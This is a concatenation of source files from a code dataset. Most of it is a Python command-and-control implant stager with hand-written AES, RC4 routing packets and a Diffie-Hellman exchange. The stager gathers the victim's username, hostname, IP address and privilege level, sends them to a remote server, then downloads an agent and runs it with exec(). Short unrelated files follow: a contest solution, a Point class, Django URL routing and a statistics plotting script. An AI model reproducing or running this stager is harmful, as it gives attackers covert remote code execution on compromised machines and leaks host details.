0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46]
U4 = [0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d]
def __init__(self, key):
if len(key) not in (16, 24, 32):
raise ValueError('Invalid key size')
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
# Key expansion (fips-197 section 5.2)
rconpointer = 0
t = KC
while t < round_key_count:
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
j = 0
while j < KC and t < round_key_count:
self._Ke[t // 4][t % 4] = tk[j]
self._Kd[rounds - (t // 4)][t % 4] = tk[j]
j += 1
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
if len(plaintext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Ke) - 1
(s1, s2, s3) = [1, 2, 3]
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T4[ t[(i + s3) % 4] & 0xFF] ^
self._Ke[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
'Decrypt a block of cipher text using the AES block cipher.'
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = [ ]
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
class AESBlockModeOfOperation(object):
'''Super-class for AES modes of operation that require blocks.'''
def __init__(self, key):
self._aes = AES(key)
def decrypt(self, ciphertext):
raise Exception('not implemented')
def encrypt(self, plaintext):
raise Exception('not implemented')
class AESModeOfOperationCBC(AESBlockModeOfOperation):
name = "Cipher-Block Chaining (CBC)"
def __init__(self, key, iv=None):
if iv is None:
self._last_cipherblock = [0] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_cipherblock = _string_to_bytes(iv)
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)]
self._last_cipherblock = self._aes.encrypt(precipherblock)
return _bytes_to_string(self._last_cipherblock)
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
cipherblock = _string_to_bytes(ciphertext)
plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)]
self._last_cipherblock = cipherblock
return _bytes_to_string(plaintext)
def CBCenc(aesObj, plaintext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
return ciphertext
def CBCdec(aesObj, ciphertext, base64=False):
# break the blocks in 16 byte chunks, padding the last chunk if necessary
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
return plaintext
def getIV(len=16):
return ''.join(chr(random.randint(0, 255)) for _ in range(len))
def aes_encrypt(key, data):
"""
Generate a random IV and new AES cipher object with the given
key, and return IV + encryptedData.
"""
IV = getIV()
aes = AESModeOfOperationCBC(key, iv=IV)
return IV + CBCenc(aes, data)
def aes_encrypt_then_hmac(key, data):
"""
Encrypt the data then calculate HMAC over the ciphertext.
"""
data = aes_encrypt(key, data)
mac = hmac.new(str(key), data, hashlib.sha256).digest()
return data + mac[0:10]
def aes_decrypt(key, data):
"""
Generate an AES cipher object, pull out the IV from the data
and return the unencrypted data.
"""
IV = data[0:16]
aes = AESModeOfOperationCBC(key, iv=IV)
return CBCdec(aes, data[16:])
def verify_hmac(key, data):
"""
Verify the HMAC supplied in the data with the given key.
"""
if len(data) > 20:
mac = data[-10:]
data = data[:-10]
expected = hmac.new(key, data, hashlib.sha256).digest()[0:10]
# Double HMAC to prevent timing attacks. hmac.compare_digest() is
# preferable, but only available since Python 2.7.7.
return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest()
else:
return False
def aes_decrypt_and_verify(key, data):
"""
Decrypt the data, but only if it has a valid MAC.
"""
if len(data) > 32 and verify_hmac(key, data):
return aes_decrypt(key, data[:-10])
raise Exception("Invalid ciphertext received.")
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
S,j,out=range(256),0,[]
for i in range(256):
j=(j+S[i]+ord(key[i%len(key)]))%256
S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
i=(i+1)%256
j=(j+S[i])%256
S[i],S[j]=S[j],S[i]
out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
return ''.join(out)
def parse_routing_packet(stagingKey, data):
"""
Decodes the rc4 "routing packet" and parses raw agent data into:
{sessionID : (language, meta, additional, [encData]), ...}
Routing packet format:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
if data:
results = {}
offset = 0
# ensure we have at least the 20 bytes for a routing packet
if len(data) >= 20:
while True:
if len(data) - offset < 20:
break
RC4IV = data[0+offset:4+offset]
RC4data = data[4+offset:20+offset]
routingPacket = rc4(RC4IV+stagingKey, RC4data)
sessionID = routingPacket[0:8]
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
(language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:])
if length < 0:
encData = None
else:
encData = data[(20+offset):(20+offset+length)]
results[sessionID] = (LANGUAGE_IDS.get(language, 'NONE'), META_IDS.get(meta, 'NONE'), ADDITIONAL_IDS.get(additional, 'NONE'), encData)
# check if we're at the end of the packet processing
remainingData = data[20+offset+length:]
if not remainingData or remainingData == '':
break
offset += 20 + length
return results
else:
print "[*] parse_agent_data() data length incorrect: %s" % (len(data))
return None
else:
print "[*] parse_agent_data() data is None"
return None
def build_routing_packet(stagingKey, sessionID, meta=0, additional=0, encData=''):
"""
Takes the specified parameters for an RC4 "routing packet" and builds/returns
an HMAC'ed RC4 "routing packet".
packet format:
Routing Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
# binary pack all of the passed config values as unsigned numbers
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData))
RC4IV = os.urandom(4)
key = RC4IV + stagingKey
rc4EncData = rc4(key, data)
packet = RC4IV + rc4EncData + encData
return packet
def post_message(uri, data):
global headers
return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read()
def get_sysinfo(nonce='00000000'):
# nonce | listener | domainname | username | hostname | internal_ip | os_details | os_details | high_integrity | process_name | process_id | language | language_version
__FAILED_FUNCTION = '[FAILED QUERY]'
try:
username = pwd.getpwuid(os.getuid())[0]
except Exception as e:
username = __FAILED_FUNCTION
try:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
highIntegrity = "True" if (uid == "0") else False
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
internalIP = __FAILED_FUNCTION
try:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
temp = sys.version_info
pyVersion = "%s.%s" % (temp[0],temp[1])
except Exception as e:
pyVersion = __FAILED_FUNCTION
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
processName = 'python'
return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)
# generate a randomized sessionID
sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8))
# server configuration information
stagingKey = "REPLACE_STAGING_KEY"
profile = 'REPLACE_PROFILE'
WorkingHours = 'SET_WORKINGHOURS'
KillDate = 'SET_KILLDATE'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" % (sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
# stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
clientPub = DiffieHellman()
hmacData = aes_encrypt_then_hmac(stagingKey, str(clientPub.publicKey))
# RC4 routing packet:
# meta = STAGE1 (2)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=2, encData=hmacData)
try:
postURI = server + '/index.jsp'
# response = post_message(postURI, routingPacket+hmacData)
response = post_message(postURI, routingPacket)
except:
exit()
# decrypt the server's public key and the server nonce
packet = aes_decrypt_and_verify(stagingKey, response)
nonce = packet[0:16]
serverPub = int(packet[16:])
# calculate the shared secret
clientPub.genKey(serverPub)
key = clientPub.key
# step 5 -> client POSTs HMAC(AESs([nonce+1]|sysinfo)
postURI = server + '/index.php'
hmacData = aes_encrypt_then_hmac(clientPub.key, get_sysinfo(nonce=str(int(nonce)+1)))
# RC4 routing packet:
# sessionID = sessionID
# language = PYTHON (2)
# meta = STAGE2 (3)
# extra = 0
# length = len(length)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=3, encData=hmacData)
response = post_message(postURI, routingPacket)
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, response)
agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours)
agent = agent.replace('REPLACE_KILLDATE', KillDate)
exec(agent)
| 83.41217 | 3,081 | 0.734419 |
4f3a2e637fa03ce2fcf0b20bbd5e026391b03f8a | 379 | py | Python | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | 1 | 2021-07-11T03:20:10.000Z | 2021-07-11T03:20:10.000Z | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | 39 | 2021-07-10T05:21:09.000Z | 2021-12-15T06:10:12.000Z | src/codechef/start7/ceilsum/sol_0.py | kagemeka/competitive-programming | c70fe481bcd518f507b885fc9234691d8ce63171 | [
"MIT"
] | null | null | null | import typing
def ceil(
n: int,
d: int,
) -> int:
return (n + d - 1) // d
def solve(
a: int,
b: int,
) -> typing.NoReturn:
x = ceil(b - a, 2)
if a == b:
print(x)
return
y = ceil(b - a - 1, 2) + 1
print(max(x, y))
def main():
t = int(input())
for _ in range(t):
a, b = map(
int, input().split(),
)
solve(a, b)
main() | 9.973684 | 28 | 0.451187 |
5701297692829dd4e33592b4f4e5a5bbaea9f400 | 861 | py | Python | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 2 | 2021-10-04T12:20:36.000Z | 2021-10-04T12:21:17.000Z | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 1 | 2021-10-04T13:59:48.000Z | 2021-10-04T13:59:48.000Z | Base/bp2DPnt.py | BitastaB/autumn2021-base | 84cadacd35d21904b315fef133271cb2976e8416 | [
"MIT"
] | 7 | 2021-10-04T12:23:53.000Z | 2022-03-30T20:05:17.000Z |
import numpy as np
class Point:
def __init__(self, x, y):
self.coord = np.array([x, y], dtype=int)
def __repr__(self):
return '(%d, %d)' % (self.coord[0], self.coord[1])
def __eq__(self, other):
return self.coord[0] == other.coord[0] and self.coord[1] == other.coord[1]
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
return Point(self.coord[0] + other.coord[0], self.coord[1] + other.coord[1])
def __hash__(self):
return hash((self.coord[0], self.coord[1]))
def copy(self):
return Point(self.coord[0], self.coord[1])
def get_coord(self):
return self.coord
def get_x(self):
return self.coord[0]
def get_y(self):
return self.coord[1]
if __name__ == '__main__':
pass
| 17.9375 | 84 | 0.569106 |
d561abcc06b6b94405510686c4cd34c16720ad4e | 941 | py | Python | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | Hello/urls.py | singhpawank/Hello-MyWorld | 0dce27f01e396a38427b4d80a0b51213f9c46069 | [
"MIT"
] | null | null | null | """Hello URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
admin.site.site_header = "Hello! Admin"
admin.site.site_title = "Hello! Admin Portal"
admin.site.index_title = "Welcome to Hello! Researcher Portal"
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('home.urls'))
]
| 34.851852 | 77 | 0.712009 |
fcbae9d6b757a80e72098718156e2187e7683903 | 3,757 | py | Python | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | null | null | null | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | 3 | 2019-10-02T09:25:08.000Z | 2022-02-27T20:48:06.000Z | assets/img/computed_probabilities_vs_theoretic_probabilities/main.py | drvinceknight/testing_for_ZD | a08643849a8e4ed3c1ee86ab8bd4530a97e92154 | [
"MIT"
] | null | null | null | """
Plot the measured probabilities versus the theoretic ones
"""
import sys
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import statsmodels.api as sm
import tqdm
import imp
import testzd as zd
parameters = imp.load_source("parameters", "../../../data/raw/parameters.py")
def main(process_data):
if process_data:
rates = ["P(C|CC)", "P(C|CD)", "P(C|DC)", "P(C|DD)"]
probabilities = ["P(CC)", "P(CD)", "P(DC)", "P(DD)"]
df = pd.concat(
(
pd.read_csv(
"../../../data/processed/full/std/per_opponent/main.csv"
),
pd.read_csv(
"../../../data/processed/stewart_plotkin/std/per_opponent/main.csv"
),
)
)
player_pair_vectors = {}
player_pair_probabilities = {}
for _, row in tqdm.tqdm(df.iterrows(), total=df.shape[0]):
pair = tuple(row[["Player index", "Opponent index"]])
if pair[::-1] in player_pair_vectors:
player_pair_vectors[pair[::-1]].append(tuple(row[rates]))
else:
player_pair_vectors[pair] = [tuple(row[rates])]
player_pair_probabilities[pair] = tuple(row[probabilities])
data = []
player_pair_theoretic_probabilities = {}
for i, j in player_pair_probabilities:
try:
p, q = player_pair_vectors[i, j]
except ValueError:
p = player_pair_vectors[i, j][0]
q = p
try:
pi = zd.compute_pi(np.array(p), np.array(q))[:, 0]
except np.linalg.LinAlgError:
pi = [np.nan, np.nan, np.nan, np.nan]
data.append([i, j, *pi, *player_pair_probabilities[i, j]])
df = pd.DataFrame(
data,
columns=[
"Player index",
"Opponent index",
"theoretic P(CC)",
"theoretic P(CD)",
"theoretic P(DC)",
"theoretic P(DD)",
"P(CC)",
"P(CD)",
"P(DC)",
"P(DD)",
],
)
df.dropna(inplace=True)
df.to_csv("main.csv", index=False)
else:
df = pd.read_csv("main.csv")
fig, axarr = plt.subplots(nrows=2, ncols=2, sharex="col", sharey="row")
index = (
np.isfinite(df["P(CC)"])
& np.isfinite(df["P(CD)"])
& np.isfinite(df["P(DC)"])
& np.isfinite(df["P(DD)"])
& (df[f"theoretic P(CC)"] >= 0)
& (df[f"theoretic P(CC)"] <= 1)
& (df[f"theoretic P(CD)"] >= 0)
& (df[f"theoretic P(CD)"] <= 1)
& (df[f"theoretic P(DC)"] >= 0)
& (df[f"theoretic P(DC)"] <= 1)
& (df[f"theoretic P(DD)"] >= 0)
& (df[f"theoretic P(DD)"] <= 1)
)
for i, state in enumerate(("CC", "CD", "DC", "DD")):
ax = axarr[int(i / 2), i % 2]
prob = f"P({state})"
y = df[index][prob]
x = df[index][f"theoretic {prob}"]
ax.scatter(x, y, label=prob)
x_for_model = sm.add_constant(x)
model = sm.OLS(y, x_for_model)
results = model.fit()
b, a = results.params
ax.plot([0, 1], [b, a + b], color="black")
if i in [2, 3]:
ax.set_xlabel("Computed probabilities")
if i in [0, 2]:
ax.set_ylabel("Measured probabilities")
ax.set_title(
f"P({state}) ($N={int(results.nobs)},\;R^2={round(results.rsquared, 3)}$)"
)
fig.tight_layout()
fig.savefig("main.pdf")
if __name__ == "__main__":
process_data = "process_data" in sys.argv
main(process_data=process_data)
| 29.582677 | 87 | 0.48922 |
8c26dce072271b24952915da79c5e1bf762647c7 | 5,216 | py | Python | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
"BSD-3-Clause"
] | 6 | 2022-03-09T23:10:28.000Z | 2022-03-21T05:32:40.000Z | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
